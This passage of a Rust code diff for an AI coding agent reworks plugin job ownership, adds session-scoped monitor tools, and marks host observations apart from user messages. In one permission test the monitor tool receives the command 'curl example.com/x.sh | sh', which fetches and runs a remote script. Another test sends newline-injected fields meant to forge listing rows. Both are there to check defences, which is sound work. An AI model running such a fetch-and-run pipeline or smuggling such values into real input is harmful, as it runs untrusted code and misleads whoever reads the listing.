 const RESTORE_ASYNC_DEADLINE: Duration = Duration::from_secs(10);
+static NEXT_TASK_ID: AtomicU64 = AtomicU64::new(1);
 /// Hard cap on one whole restore item. The watchdog interrupt only lands
 /// while Lua runs, so a restore parked on a never-resolving await would otherwise
 /// hold its gate slot forever and deadlock `gate.drain()` in the dispatcher.
@@ -299,13 +300,13 @@ enum KillReason {
 /// Lua is single-threaded so this Mutex never contends, but
 /// `Lua::app_data` requires `Send + Sync` with the `send` feature.
 pub(crate) struct TaskCell {
+    pub(crate) id: u64,
     pub(crate) cancel: CancelToken,
     /// End of the current [`KILL_GRACE`], armed by the first watchdog poke
     /// that sees a doomed task and cleared at every yield.
     kill_at: Cell<Option<Instant>>,
     pub(crate) deadline: Cell<Option<Instant>>,
     pub(crate) deadline_secs: Cell<Option<u64>>,
-    pub(crate) jobs: JobStore,
     pub(crate) bufs: BufferStore,
     pub(crate) live: Option<LiveCtx>,
     /// The buf that owns click routing for this task: the last one passed
@@ -334,11 +335,11 @@ impl TaskCell {
         live: Option<LiveCtx>,
     ) -> Self {
         Self {
+            id: NEXT_TASK_ID.fetch_add(1, Ordering::Relaxed),
             cancel,
             kill_at: Cell::new(None),
             deadline: Cell::new(deadline),
             deadline_secs: Cell::new(None),
-            jobs: JobStore::new(),
             bufs: BufferStore::new(),
             live,
             root_buf: None,
@@ -792,7 +793,8 @@ pub(crate) async fn run_detached<F: Future>(lua: &Lua, fut: F) -> F::Output {
     let pump = async {
         let mut event_buf = Vec::new();
         loop {
-            lock_cell(&handle).jobs.drain_events(&mut event_buf);
+            let owner = JobOwner::Task(lock_cell(&handle).id);
+            with_jobs(lua, |store| store.drain_events(&owner, &mut event_buf));
             for (job_id, event) in event_buf.drain(..) {
                 if let Err(e) = deliver_job_event(lua, job_id, &event) {
                     tracing::warn!(error = %strip_traceback(&e), "detached job callback failed");
@@ -808,12 +810,14 @@ pub(crate) async fn run_detached<F: Future>(lua: &Lua, fut: F) -> F::Output {
 
 impl Drop for TaskScope {
     fn drop(&mut self) {
-        {
+        let task_id = {
             let mut cell = lock_cell(&self.handle);
-            cell.jobs.kill_all();
-            cell.jobs.clear(&self.lua);
             cell.clear_cancel_hooks(&self.lua);
-        }
+            cell.id
+        };
+        with_jobs(&self.lua, |store| {
+            store.kill_owner(&self.lua, &JobOwner::Task(task_id));
+        });
         match self.prev.take() {
             Some(p) => {
                 self.lua.set_app_data(p);
@@ -889,8 +893,19 @@ pub(crate) fn active_task(lua: &Lua) -> TaskHandle {
         .expect("task accessor called outside a task scope")
 }
 
-pub(crate) fn with_task_jobs<R>(lua: &Lua, f: impl FnOnce(&mut JobStore) -> R) -> R {
-    f(&mut lock_cell(&active_task(lua)).jobs)
+pub(crate) fn with_jobs<R>(lua: &Lua, f: impl FnOnce(&mut JobStore) -> R) -> R {
+    if lua.app_data_ref::<JobStore>().is_none() {
+        lua.set_app_data(JobStore::new());
+    }
+    let mut store = lua
+        .app_data_mut::<JobStore>()
+        .expect("job store was just installed");
+    f(&mut store)
+}
+
+pub(crate) fn active_task_id(lua: &Lua) -> Option<u64> {
+    let handle = lua.app_data_ref::<TaskHandle>()?;
+    Some(lock_cell(&handle).id)
 }
 
 pub(crate) fn with_task_bufs<R>(lua: &Lua, f: impl FnOnce(&mut BufferStore) -> R) -> R {
@@ -1317,6 +1332,7 @@ impl LuaRuntime {
         })?;
 
         lua.set_app_data(CommandHandlerMap::new());
+        lua.set_app_data(JobStore::new());
         lua.set_app_data(SpawnQueue::new());
         lua.set_app_data(command_writer);
         lua.set_app_data(PromptHintCallbacks::default());
@@ -1391,6 +1407,9 @@ impl LuaRuntime {
 
     fn drop_plugin_keys(&mut self, name: &str) {
         self.warm_tools.borrow_mut().clear();
+        with_jobs(&self.lua, |store| {
+            store.kill_owner(&self.lua, &JobOwner::Plugin(Arc::from(name)));
+        });
         if let Some(mut store) = self.lua.app_data_mut::<PluginOptionSpecs>() {
             store.remove(name);
         }
@@ -2099,7 +2118,8 @@ async fn dispatch_async(
     tool: &str,
     finish_rx: flume::Receiver<ToolCallReply>,
 ) -> ToolCallReply {
-    if lock_cell(&handle).jobs.is_empty() {
+    let owner = JobOwner::Task(lock_cell(&handle).id);
+    if with_jobs(lua, |store| store.is_empty(&owner)) {
         lua.gc_collect().ok();
         smol::Timer::after(DISPATCH_POLL_INTERVAL).await;
         return match finish_rx.try_recv() {
@@ -2129,11 +2149,10 @@ async fn dispatch_async(
             Err(flume::TryRecvError::Empty) => {}
         }
 
-        lock_cell(&handle).jobs.drain_events(&mut event_buf);
+        with_jobs(lua, |store| store.drain_events(&owner, &mut event_buf));
 
         if event_buf.is_empty() {
-            let has_alive = lock_cell(&handle).jobs.has_alive_jobs();
-            if !has_alive {
+            if with_jobs(lua, |store| store.is_empty(&owner)) {
                 smol::Timer::after(DISPATCH_POLL_INTERVAL).await;
                 return match finish_rx.try_recv() {
                     Ok(reply) => reply,
@@ -2424,6 +2443,31 @@ pub fn spawn(
             };
 
             let ex = Rc::new(smol::LocalExecutor::new());
+            {
+                let lua = rt.lua.clone();
+                ex.spawn(async move {
+                    let mut event_buf = Vec::new();
+                    loop {
+                        with_jobs(&lua, |store| {
+                            store.drain_plugin_events(&mut event_buf);
+                        });
+                        if !event_buf.is_empty() {
+                            let scope = TaskScope::detached(&lua);
+                            for (job_id, event) in event_buf.drain(..) {
+                                if let Err(e) = deliver_job_event(&lua, job_id, &event) {
+                                    tracing::warn!(
+                                        error = %strip_traceback(&e),
+                                        "plugin job callback failed"
+                                    );
+                                }
+                            }
+                            drop(scope);
+                        }
+                        smol::Timer::after(DISPATCH_POLL_INTERVAL).await;
+                    }
+                })
+                .detach();
+            }
             let gate = Rc::new(InflightGate::new(rt.lua.clone()));
             let restores = Rc::new(RestoreTracker::default());
             let spawn_rx = rt
@@ -2811,7 +2855,7 @@ mod tests {
     }
 
     #[test]
-    fn task_scope_clears_jobs_and_bufs_on_drop() {
+    fn task_scope_clears_bufs_on_drop() {
         let lua = Lua::new();
         let scope = TaskScope::new(&lua, task_cell(None));
         let handle = Arc::clone(scope.handle());
@@ -2819,6 +2863,30 @@ mod tests {
         assert!(lock_cell(&handle).bufs.live_buf().is_some());
         drop(scope);
         assert!(lock_cell(&handle).bufs.live_buf().is_none());
+    }
+
+    #[test]
+    fn task_scope_clears_only_its_jobs_on_drop() {
+        let lua = Lua::new();
+        let scope = TaskScope::new(&lua, task_cell(None));
+        let task_owner = JobOwner::Task(lock_cell(scope.handle()).id);
+        let plugin_owner = JobOwner::Plugin(Arc::from("test-plugin"));
+        with_jobs(&lua, |store| {
+            store
+                .start(task_owner.clone(), "exit 0", None, None, None, None, None)
+                .unwrap();
+            store
+                .start(plugin_owner.clone(), "exit 0", None, None, None, None, None)
+                .unwrap();
+        });
+
+        drop(scope);
+
+        with_jobs(&lua, |store| {
+            assert!(store.is_empty(&task_owner));
+            assert!(!store.is_empty(&plugin_owner));
+            store.kill_owner(&lua, &plugin_owner);
+        });
     }
 
     #[test]
@@ -3648,10 +3716,11 @@ mod tests {
         thread::spawn(move || {
             let lua = Lua::new();
             let scope = TaskScope::new(&lua, cell);
-            lock_cell(scope.handle())
-                .jobs
-                .start(DISPATCH_TEST_JOB, None, None, None, None, None)
-                .unwrap();
+            let owner = JobOwner::Task(lock_cell(scope.handle()).id);
+            with_jobs(&lua, |store| {
+                store.start(owner, DISPATCH_TEST_JOB, None, None, None, None, None)
+            })
+            .unwrap();
             let (_finish_tx, finish_rx) = flume::bounded(1);
 
             let start = Instant::now();

--- a/maki-lua/tests/plugin_host.rs
+++ b/maki-lua/tests/plugin_host.rs
@@ -4,14 +4,14 @@ use std::path::Path;
 use std::sync::Arc;
 use std::time::Duration;
 
-use maki_agent::ToolOutput;
 use maki_agent::tools::{
     DescriptionContext, ExecFuture, HeaderFuture, HeaderResult, ParseError, Tool, ToolContext,
     ToolExecResult, ToolInvocation, ToolLive, ToolRegistry, ToolSource, timeout_annotation,
 };
+use maki_agent::{SessionMailbox, ToolOutput};
 use maki_config::{AlwaysThinking, PluginsConfig, ToolOutputLines};
 use maki_lua::{PluginError, PluginHost, WARM_TOOL_CAP};
-use maki_storage::id::SessionRef;
+use maki_storage::id::{MakiId, SessionRef};
 use serde_json::{Value, json};
 
 const NARGS_ERR: &str = r#"'nargs' must be 0, 1, "?", "*", or "+""#;
@@ -480,6 +480,106 @@ fn a_monitor_cannot_forge_rows_in_the_listing() {
     assert!(
         rest.starts_with("real "),
         "the label stayed inside its own row: {listed}"
+    );
+}
+
+#[test]
+fn monitor_rejects_an_invalid_match_pattern() {
+    const SESSION_ID: &str = "01965087-4c71-7f00-8000-00000000000d";
+    const INVALID_PATTERN: &str = "[";
+    const EXPECTED_ERROR: &str = "invalid match pattern";
+
+    let (reg, _host) = builtins_host();
+    let ctx = ctx_for_session(SESSION_ID);
+
+    let error = exec_with_ctx(
+        &reg,
+        "monitor",
+        json!({ "command": "sleep 5", "match": INVALID_PATTERN }),
+        &ctx,
+    )
+    .expect_err("invalid match patterns must be rejected");
+    assert!(error.contains(EXPECTED_ERROR), "got: {error}");
+    assert_eq!(
+        exec_with_ctx(&reg, "monitor_list", json!({}), &ctx).expect("list failed"),
+        "no monitors running"
+    );
+}
+
+#[test]
+fn monitor_reports_stderr_to_the_session_mailbox() {
+    const SESSION_ID: &str = "01965087-4c71-7f00-8000-00000000000e";
+    const STDERR_LINE: &str = "stderr: broken";
+
+    let (reg, host) = builtins_host();
+    let ctx = ctx_for_session(SESSION_ID);
+    let mailbox = SessionMailbox::register(SESSION_ID.parse::<MakiId>().unwrap());
+
+    exec_with_ctx(
+        &reg,
+        "monitor",
+        json!({ "command": "printf 'broken\\n' >&2", "label": "build" }),
+        &ctx,
+    )
+    .expect("monitor failed to start");
+    let deadline = std::time::Instant::now() + Duration::from_secs(5);
+    loop {
+        let observations = mailbox.drain();
+        if observations
+            .iter()
+            .filter_map(|message| message.user_text())
+            .any(|text| text.contains(STDERR_LINE))
+        {
+            break;
+        }
+        assert!(
+            std::time::Instant::now() < deadline,
+            "stderr observation missing"
+        );
+        std::thread::sleep(Duration::from_millis(10));
+    }
+
+    barrier(&host);
+}
+
+#[test]
+fn session_reset_stops_only_that_sessions_monitors() {
+    const SESSION_A: &str = "01965087-4c71-7f00-8000-00000000000f";
+    const SESSION_B: &str = "01965087-4c71-7f00-8000-000000000010";
+
+    let (reg, host) = builtins_host();
+    let ctx_a = ctx_for_session(SESSION_A);
+    let ctx_b = ctx_for_session(SESSION_B);
+    let reset_session = SESSION_A.parse::<MakiId>().unwrap().to_string();
+
+    exec_with_ctx(
+        &reg,
+        "monitor",
+        json!({ "command": "sleep 30", "label": "reset" }),
+        &ctx_a,
+    )
+    .expect("first monitor failed to start");
+    exec_with_ctx(
+        &reg,
+        "monitor",
+        json!({ "command": "sleep 30", "label": "kept" }),
+        &ctx_b,
+    )
+    .expect("second monitor failed to start");
+
+    host.event_handle()
+        .fire_autocmd("SessionReset", json!({ "session_id": reset_session }));
+    barrier(&host);
+
+    assert_eq!(
+        exec_with_ctx(&reg, "monitor_list", json!({}), &ctx_a).expect("list failed"),
+        "no monitors running"
+    );
+    assert!(
+        exec_with_ctx(&reg, "monitor_list", json!({}), &ctx_b)
+            .expect("list failed")
+            .contains("kept"),
+        "another session's monitor must survive reset"
     );
 }
 

--- a/maki-lua/tests/plugin_host.rs
+++ b/maki-lua/tests/plugin_host.rs
@@ -1855,6 +1855,99 @@ fn jobstop_kills_running_job() {
 }
 
 #[test]
+fn plugin_owned_job_outlives_its_starting_tool() {
+    let reg = fresh_registry();
+    let host = PluginHost::new(Arc::clone(&reg)).unwrap();
+    let src = format!(
+        r#"
+local output = "pending"
+local exit_code = "pending"
+maki.api.register_tool({{
+    name = "start_plugin_job",
+    description = "starts a plugin-owned job",
+    schema = {MINIMAL_SCHEMA},
+    audiences = {{ "main" }},
+    handler = function()
+        local id = maki.fn.jobstart("sleep 0.1; printf plugin-output; exit 7", {{
+            owner = "plugin",
+            on_stdout = function(_, line) output = line end,
+            on_exit = function(_, code) exit_code = tostring(code) end,
+        }})
+        return maki.fn.jobwait(id, 1) == nil and "started" or "did not time out"
+    end,
+}})
+maki.api.register_tool({{
+    name = "plugin_job_state",
+    description = "reports plugin-owned job callbacks",
+    schema = {MINIMAL_SCHEMA},
+    audiences = {{ "main" }},
+    handler = function()
+        return output .. "/" .. exit_code
+    end,
+}})
+"#
+    );
+    host.load_source("plugin_job", &src).unwrap();
+    assert_eq!(
+        exec_tool(&reg, "start_plugin_job", json!({})).unwrap(),
+        "started"
+    );
+
+    let deadline = std::time::Instant::now() + Duration::from_secs(5);
+    loop {
+        let state = exec_tool(&reg, "plugin_job_state", json!({})).unwrap();
+        if state == "plugin-output/7" {
+            break;
+        }
+        assert!(
+            std::time::Instant::now() < deadline,
+            "plugin-owned callbacks did not run: {state}"
+        );
+        std::thread::sleep(Duration::from_millis(10));
+    }
+}
+
+#[cfg(unix)]
+#[test]
+fn unloading_plugin_kills_its_jobs() {
+    let host = PluginHost::new(fresh_registry()).unwrap();
+    let dir = tempfile::tempdir().unwrap();
+    let pid_path = dir.path().join("job.pid");
+    let src = format!(
+        r#"maki.fn.jobstart("printf %s $$ > '{}'; exec sleep 30", {{
+            owner = "plugin",
+        }})"#,
+        pid_path.display()
+    );
+    host.load_source("plugin_job", &src).unwrap();
+
+    let deadline = std::time::Instant::now() + Duration::from_secs(5);
+    while !pid_path.exists() {
+        assert!(
+            std::time::Instant::now() < deadline,
+            "plugin job did not publish its process id"
+        );
+        std::thread::sleep(Duration::from_millis(10));
+    }
+    let pid = std::fs::read_to_string(&pid_path)
+        .unwrap()
+        .parse::<libc::pid_t>()
+        .unwrap();
+    assert_eq!(unsafe { libc::killpg(pid, 0) }, 0);
+
+    host.unload("plugin_job").unwrap();
+
+    let deadline = std::time::Instant::now() + Duration::from_secs(5);
+    while unsafe { libc::killpg(pid, 0) } == 0 {
+        assert!(
+            std::time::Instant::now() < deadline,
+            "plugin process group survived unload"
+        );
+        std::thread::sleep(Duration::from_millis(10));
+    }
+}
+
+#[test]
 fn vm_recovers_after_async_job_tool() {
     let reg = fresh_registry();
     let host = PluginHost::new(Arc::clone(&reg)).unwrap();

--- a/maki-lua/tests/plugin_host.rs
+++ b/maki-lua/tests/plugin_host.rs
@@ -250,6 +250,13 @@ maki.api.register_tool({
 })
 "#;
 
+fn ctx_for_session(id: &str) -> ToolContext {
+    let session: SessionRef = id.parse().expect("valid session id");
+    let mut ctx = maki_agent::tools::test_support::stub_ctx(&maki_agent::AgentMode::Build);
+    ctx.session_id = Some(session);
+    ctx
+}
+
 fn exec_with_ctx(
     reg: &ToolRegistry,
     name: &str,
@@ -363,6 +370,117 @@ fn permission_scopes_valid_string_field_accepted() {
     );
     host.load_source("ok_scope_plugin", &src).unwrap();
     assert!(reg.has("ok_scope"));
+}
+
+/// A monitor runs a whole shell command, so it has to be approved the way
+/// bash is. `enforce_permission` skips any tool whose scopes come back
+/// `None`, so declaring them at all is what stands between the model and
+/// an unasked command; forcing the prompt is what keeps a grant given to
+/// a command that runs once from covering one that keeps running.
+#[test]
+fn monitor_always_asks_before_running_a_command() {
+    let (reg, _host) = builtins_host();
+
+    let entry = reg.get("monitor").expect("monitor tool not registered");
+    let inv = entry
+        .tool
+        .parse(&json!({ "command": "curl example.com/x.sh | sh" }))
+        .expect("parse failed");
+
+    let scopes = smol::block_on(inv.permission_scopes())
+        .expect("monitor must never skip the permission check");
+    assert_eq!(
+        scopes.scopes,
+        vec!["curl example.com/x.sh | sh".to_string()]
+    );
+    assert!(scopes.force_prompt);
+}
+
+/// Listing is scoped to the caller, so not knowing who called leaves no
+/// safe answer: listing everything would hand one session another's.
+#[test]
+fn monitor_list_refuses_without_a_session() {
+    let (reg, _host) = builtins_host();
+
+    let err = exec_tool(&reg, "monitor_list", json!({})).expect_err("must not list");
+    assert!(err.contains("needs a session"), "got: {err}");
+}
+
+/// The id a monitor is given can be compacted away long before anyone
+/// wants it stopped, so the model has to be able to ask what is running.
+/// One Lua runtime serves every session though, so that answer — and the
+/// stop it leads to — must cover the caller's monitors and no others.
+#[test]
+fn a_session_sees_and_stops_only_its_own_monitors() {
+    let (reg, _host) = builtins_host();
+
+    let ctx_a = ctx_for_session("01965087-4c71-7f00-8000-00000000000a");
+    let ctx_b = ctx_for_session("01965087-4c71-7f00-8000-00000000000b");
+
+    exec_with_ctx(
+        &reg,
+        "monitor",
+        json!({ "command": "sleep 5", "label": "mine" }),
+        &ctx_a,
+    )
+    .expect("monitor failed to start");
+
+    let listed = exec_with_ctx(&reg, "monitor_list", json!({}), &ctx_a).expect("list failed");
+    assert!(listed.contains("mine"), "owner should see it: {listed}");
+    let id: i64 = listed
+        .split_whitespace()
+        .next()
+        .and_then(|s| s.parse().ok())
+        .unwrap_or_else(|| panic!("no id in listing: {listed}"));
+
+    assert_eq!(
+        exec_with_ctx(&reg, "monitor_list", json!({}), &ctx_b).expect("list failed"),
+        "no monitors running",
+        "another session must not see it"
+    );
+
+    let refused = exec_with_ctx(&reg, "monitor_stop", json!({ "id": id }), &ctx_b)
+        .expect_err("another session must not stop it");
+    assert!(refused.contains("no monitor with id"), "got: {refused}");
+
+    let stopped =
+        exec_with_ctx(&reg, "monitor_stop", json!({ "id": id }), &ctx_a).expect("owner may stop");
+    assert!(stopped.contains("stopped monitor"), "got: {stopped}");
+}
+
+/// The label and command are whatever the model sent. A listing is read
+/// to decide what to stop, so one monitor must stay one row: a newline
+/// through either field would let an entry invent or bury a neighbour.
+#[test]
+fn a_monitor_cannot_forge_rows_in_the_listing() {
+    let (reg, _host) = builtins_host();
+    let ctx = ctx_for_session("01965087-4c71-7f00-8000-00000000000c");
+
+    exec_with_ctx(
+        &reg,
+        "monitor",
+        json!({ "command": "sleep 5\n99  ghost  evil", "label": "real\n98  ghost  evil" }),
+        &ctx,
+    )
+    .expect("monitor failed to start");
+
+    let listed = exec_with_ctx(&reg, "monitor_list", json!({}), &ctx).expect("list failed");
+    assert_eq!(
+        listed.lines().count(),
+        1,
+        "one monitor is one row, got:\n{listed}"
+    );
+    let (id, rest) = listed
+        .split_once("  ")
+        .expect("a row is `id  label  command`");
+    assert!(
+        id.parse::<i64>().is_ok(),
+        "the row still starts with the real id: {listed}"
+    );
+    assert!(
+        rest.starts_with("real "),
+        "the label stayed inside its own row: {listed}"
+    );
 }
 
 #[test]

--- a/maki-providers/src/lib.rs
+++ b/maki-providers/src/lib.rs
@@ -21,6 +21,6 @@ pub use providers::opencode::{
 };
 pub use types::{
     ContentBlock, Effort, EffortDialect, IMAGE_OMITTED_NOTE, ImageMediaType, ImageSource, Message,
-    ProviderEvent, ProviderUsage, RequestOptions, Role, StopReason, StreamResponse, ThinkingConfig,
-    UsageLimit, adapt_images_for_model, dialect,
+    MessageKind, ProviderEvent, ProviderUsage, RequestOptions, Role, StopReason, StreamResponse,
+    ThinkingConfig, UsageLimit, adapt_images_for_model, dialect, drop_observations,
 };

--- a/maki-providers/src/types.rs
+++ b/maki-providers/src/types.rs
@@ -2,6 +2,9 @@
 //! `Message.display_text`: `Some("")` marks a message as synthetic (sent to the API but hidden
 //! from the UI). `user_text()` returns `None` for these, so system-injected messages
 //! (cancel markers, compaction prompts) stay invisible without a separate type.
+//! `Message.kind` answers a different question. Synthetic text is ours and
+//! trusted, it is just not worth showing. An observation comes from outside,
+//! is worth showing, and must never be mistaken for the user talking.
 
 use std::borrow::Cow;
 use std::sync::Arc;
@@ -160,15 +163,67 @@ pub enum ContentBlock {
     },
 }
 
+/// Who a message came from, which `role` cannot say. Providers only
+/// accept user and assistant, so anything the host wants to report has to
+/// travel as a user message, and without this there is no way to tell it
+/// apart from the user actually typing. A prefix in the text would not do:
+/// a log line can print one.
+#[derive(Debug, Default, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
+#[serde(rename_all = "snake_case")]
+pub enum MessageKind {
+    /// Someone said this, the user or the model.
+    #[default]
+    Turn,
+    /// The host noticed it and passed it along. Cheapest thing to drop
+    /// when context runs short, and not worth replaying on resume.
+    Observation,
+}
+
+impl MessageKind {
+    fn is_turn(&self) -> bool {
+        matches!(self, Self::Turn)
+    }
+}
+
 #[derive(Debug, Default, Clone, Serialize, Deserialize)]
 pub struct Message {
     pub role: Role,
     pub content: Vec<ContentBlock>,
     #[serde(default, skip_serializing_if = "Option::is_none")]
     pub display_text: Option<String>,
+    /// Skipped when it is `Turn`, so sessions written before this existed
+    /// load unchanged.
+    #[serde(default, skip_serializing_if = "MessageKind::is_turn")]
+    pub kind: MessageKind,
+}
+
+/// The one place persistence decides what an observation is worth
+/// keeping: nothing. They described a moment that has already passed, so
+/// writing them down only means replaying them at the model later.
+pub fn drop_observations(messages: &[Message]) -> Vec<Message> {
+    messages
+        .iter()
+        .filter(|m| !m.is_observation())
+        .cloned()
+        .collect()
 }
 
 impl Message {
+    /// Something the host saw, reported to the model without pretending
+    /// the user said it.
+    pub fn observation(text: String) -> Self {
+        Self {
+            role: Role::User,
+            content: vec![ContentBlock::Text { text }],
+            kind: MessageKind::Observation,
+            ..Default::default()
+        }
+    }
+
+    pub fn is_observation(&self) -> bool {
+        self.kind == MessageKind::Observation
+    }
+
     pub fn user(text: String) -> Self {
         Self {
             role: Role::User,
@@ -182,6 +237,7 @@ impl Message {
             role: Role::User,
             content: vec![ContentBlock::Text { text: ai_text }],
             display_text: Some(display),
+            ..Default::default()
         }
     }
 
@@ -205,6 +261,7 @@ impl Message {
             role: Role::User,
             content: vec![ContentBlock::Text { text }],
             display_text: Some(String::new()),
+            ..Default::default()
         }
     }
 
@@ -679,6 +736,35 @@ mod tests {
         let msg = Message::user_with_images(String::new(), vec![source]);
         assert_eq!(msg.content.len(), 1);
         assert!(matches!(&msg.content[0], ContentBlock::Image { .. }));
+    }
+
+    #[test]
+    fn message_kind_is_backward_compatible() {
+        let old: Message = serde_json::from_value(json!({
+            "role": "user",
+            "content": [{ "type": "text", "text": "hello" }]
+        }))
+        .unwrap();
+        assert_eq!(old.kind, MessageKind::Turn);
+
+        let turn = serde_json::to_value(Message::user("hello".into())).unwrap();
+        assert!(turn.get("kind").is_none());
+
+        let observation = serde_json::to_value(Message::observation("built".into())).unwrap();
+        assert_eq!(observation["kind"], "observation");
+    }
+
+    #[test]
+    fn drop_observations_preserves_turn_order() {
+        let messages = vec![
+            Message::user("first".into()),
+            Message::observation("built".into()),
+            Message::user("second".into()),
+        ];
+        let kept = drop_observations(&messages);
+        assert_eq!(kept.len(), 2);
+        assert_eq!(kept[0].user_text(), Some("first"));
+        assert_eq!(kept[1].user_text(), Some("second"));
     }
 
     #[test_case(ImageMediaType::Png,  "image/png"  ; "png")]

--- a/maki-ui/src/agent/agent_loop.rs
+++ b/maki-ui/src/agent/agent_loop.rs
@@ -302,7 +302,9 @@ impl AgentLoop {
     }
 
     fn set_cancel_trigger(&self, run_id: u64, trigger: CancelTrigger) {
-        self.cancel_map.insert(run_id, trigger);
+        // One trigger per run, and `clear_cancel_trigger` drops the whole
+        // key, so the slot is not worth carrying around.
+        let _ = self.cancel_map.insert(run_id, trigger);
     }
 
     fn clear_cancel_trigger(&self, run_id: u64) {

--- a/maki-ui/src/agent/agent_loop.rs
+++ b/maki-ui/src/agent/agent_loop.rs
@@ -13,7 +13,7 @@ use maki_agent::tools::{
 use maki_agent::{
     Agent, AgentConfig, AgentEvent, AgentInput, AgentParams, AgentRunParams, CancelMap,
     CancelToken, CancelTrigger, Envelope, EventSender, History, Instructions, McpCommand,
-    PromptRole, ToolOutputLines,
+    PromptRole, SessionMailbox, ToolOutputLines,
 };
 use maki_lua::EventHandle;
 use maki_providers::{AgentError, Message, Model, TokenUsage};
@@ -44,6 +44,7 @@ pub(super) struct AgentLoop {
     answer_rx: Arc<async_lock::Mutex<flume::Receiver<String>>>,
     queue: Arc<QueueReceiver>,
     session_id: Option<SessionRef>,
+    mailbox: Option<SessionMailbox>,
     timeouts: maki_providers::Timeouts,
     lua_handle: EventHandle,
     subagent_cancels: Arc<CancelMap<String>>,
@@ -66,6 +67,7 @@ impl AgentLoop {
         cancel_map: Arc<RunCancelMap>,
         init_cancel: CancelToken,
         session_id: Option<SessionRef>,
+        mailbox: Option<SessionMailbox>,
         timeouts: maki_providers::Timeouts,
         lua_handle: EventHandle,
         subagent_cancels: Arc<CancelMap<String>>,
@@ -90,6 +92,7 @@ impl AgentLoop {
             answer_rx: Arc::new(async_lock::Mutex::new(answer_rx)),
             queue,
             session_id,
+            mailbox,
             timeouts,
             lua_handle,
             subagent_cancels,
@@ -179,10 +182,6 @@ impl AgentLoop {
         }
         self.rebuild_tools(&slot.model, input.workflow);
 
-        for msg in std::mem::take(&mut input.preamble) {
-            self.history.push(msg);
-        }
-
         if let Some(ref prompt_ref) = input.prompt {
             let Some(ref mcp) = self.mcp else {
                 return Err(AgentError::Tool {
@@ -207,7 +206,7 @@ impl AgentLoop {
                     },
                     PromptRole::User => Message::user(text),
                 };
-                self.history.push(msg);
+                input.preamble.push(msg);
             }
         }
 
@@ -233,6 +232,7 @@ impl AgentLoop {
                 tool_output_lines: self.tool_output_lines,
                 permissions: Arc::clone(&self.permissions),
                 session_id: self.session_id.clone(),
+                mailbox: self.mailbox.clone(),
                 timeouts: self.timeouts,
                 file_tracker: Arc::clone(&self.file_tracker),
                 prompt_slots: Arc::new(prompt_slots),

--- a/maki-ui/src/agent/cancel_map.rs
+++ b/maki-ui/src/agent/cancel_map.rs
@@ -4,6 +4,8 @@ pub(super) type RunCancelMap = CancelMap<u64>;
 
 pub(super) fn new_run_cancel_map(run_id: u64, trigger: CancelTrigger) -> RunCancelMap {
     let map = RunCancelMap::new();
-    map.insert(run_id, trigger);
+    // A run holds one trigger and clears the whole key when it ends, so
+    // there is no sibling to tell apart and no slot to keep.
+    let _ = map.insert(run_id, trigger);
     map
 }

--- a/maki-ui/src/agent/mod.rs
+++ b/maki-ui/src/agent/mod.rs
@@ -11,7 +11,7 @@ use arc_swap::ArcSwap;
 use maki_agent::permissions::PermissionManager;
 use maki_agent::{
     AgentConfig, CancelMap, CancelToken, Envelope, McpCommand, McpConfigErrors, McpHandle,
-    McpSnapshotReader, ToolOutputLines,
+    McpSnapshotReader, SessionMailbox, ToolOutputLines,
 };
 use maki_lua::EventHandle;
 use maki_storage::id::SessionRef;
@@ -54,6 +54,7 @@ pub(crate) struct AgentHandles {
     pub(crate) mcp_config_errors: McpConfigErrors,
     pub(crate) queue: QueueSender,
     pub(crate) timeouts: maki_providers::Timeouts,
+    mailbox: Option<SessionMailbox>,
     task: smol::Task<()>,
 }
 
@@ -117,6 +118,13 @@ impl AgentHandles {
         if let Some(ref h) = self.mcp_handle {
             h.send(cmd);
         }
+    }
+
+    pub(crate) fn claim_mailbox_wake(&self) -> Vec<Message> {
+        self.mailbox
+            .as_ref()
+            .map(SessionMailbox::claim_wake)
+            .unwrap_or_default()
     }
 
     #[allow(clippy::too_many_arguments)]
@@ -218,6 +226,9 @@ fn spawn_agent_internal(
     let (init_trigger, init_cancel) = CancelToken::new();
     let cancel_map = Arc::new(new_run_cancel_map(0, init_trigger));
     let subagent_cancels: Arc<CancelMap<String>> = Arc::new(CancelMap::new());
+    let mailbox = session_id
+        .as_ref()
+        .map(|session_id| SessionMailbox::register(session_id.id()));
 
     spawn_command_router(
         cmd_rx,
@@ -240,6 +251,7 @@ fn spawn_agent_internal(
         cancel_map,
         init_cancel,
         session_id,
+        mailbox.clone(),
         timeouts,
         lua_handle,
         subagent_cancels,
@@ -258,6 +270,7 @@ fn spawn_agent_internal(
         mcp_config_errors,
         queue: queue_tx,
         timeouts,
+        mailbox,
         task,
     }
 }

--- a/maki-ui/src/app/queue.rs
+++ b/maki-ui/src/app/queue.rs
@@ -208,6 +208,18 @@ impl App {
         self.start_run(input, display)
     }
 
+    pub(crate) fn start_mailbox_run(
+        &mut self,
+        preamble: Vec<maki_providers::Message>,
+    ) -> Vec<Action> {
+        let mut input = self.build_agent_input(&QueuedMessage {
+            text: String::new(),
+            images: Vec::new(),
+        });
+        input.preamble = preamble;
+        self.start_run(input, String::new())
+    }
+
     /// The one place a fresh run starts: every path that emits
     /// `Action::SendMessage` must go through here so `run_id` bumps exactly
     /// once per run.
@@ -217,7 +229,9 @@ impl App {
         self.recoverable_queue.clear();
         self.status = Status::Streaming;
         self.fire_session_autocmd("TurnStart", serde_json::json!({}));
-        self.main_chat().show_user_message(display);
+        if !display.is_empty() {
+            self.main_chat().show_user_message(display);
+        }
         vec![Action::SendMessage(Box::new(input))]
     }
 }

--- a/maki-ui/src/app/session_state.rs
+++ b/maki-ui/src/app/session_state.rs
@@ -94,7 +94,7 @@ impl SessionState {
         permissions: &Arc<PermissionManager>,
     ) {
         if let Some(history) = shared_history {
-            self.session.messages = Vec::clone(&history.load());
+            self.session.messages = maki_providers::drop_observations(&history.load());
         }
         self.session.token_usage = self.token_usage;
         self.session.meta.context_size = self.context_size;
@@ -250,6 +250,27 @@ mod tests {
         let state = SessionState::from_session(session, &test_model(), &storage);
         assert_eq!(state.mode, Mode::Plan);
         assert_eq!(state.plan.path(), Some(plan_file.as_path()));
+    }
+
+    #[test]
+    fn sync_session_does_not_persist_observations() {
+        let tmp = tempfile::tempdir().unwrap();
+        let storage = StateDir::from_path(tmp.path().to_path_buf());
+        let session = AppSession::new("test-model", "/tmp");
+        let mut state = SessionState::from_session(session, &test_model(), &storage);
+        let history = Some(Arc::new(ArcSwap::from_pointee(vec![
+            Message::user("fix the login bug".into()),
+            Message::observation("build failed".into()),
+        ])));
+        let permissions = Arc::new(PermissionManager::new(
+            maki_config::PermissionsConfig::default(),
+            PathBuf::from("/tmp"),
+        ));
+
